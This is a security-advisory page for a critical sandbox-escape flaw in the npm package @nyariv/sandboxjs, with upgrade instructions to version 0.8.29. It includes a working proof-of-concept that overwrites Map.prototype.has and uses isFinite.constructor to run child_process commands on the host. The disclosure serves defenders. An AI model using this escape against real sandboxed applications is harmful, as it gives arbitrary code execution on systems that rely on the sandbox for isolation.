VDB
Sign up
CRITICAL10.0

GHSA-66h4-qj4x-38xp

@nyariv/sandboxjs has a Sandbox Escape vulnerability

Quick fix

GHSA-66h4-qj4x-38xp — @nyariv/sandboxjs: upgrade to the fixed version with the command below.

npm install @nyariv/sandboxjs@0.8.29

Details

### Summary

As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped.

### Details

This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged:

```js let a = Map.prototype; console.log(a) // undefined ```

```js const a = Map.prototype; console.log(a) // Object [Map] {} ```

```js let a = 123; console.log(a) // 123 ```

```js const a = 123; console.log(a) // 123 ```

### PoC

```js const s = require("@nyariv/sandboxjs").default; const sb = new s();

payload = ` const m = Map.prototype; m.has = isFinite;

console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );`;

sb.compile(payload)().run(); ```

### Impact

Able to set `Map.prototype.has` -> RCE

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@nyariv/sandboxjs
Introduced in: 0Fixed in: 0.8.29
Fixnpm install @nyariv/sandboxjs@0.8.29

References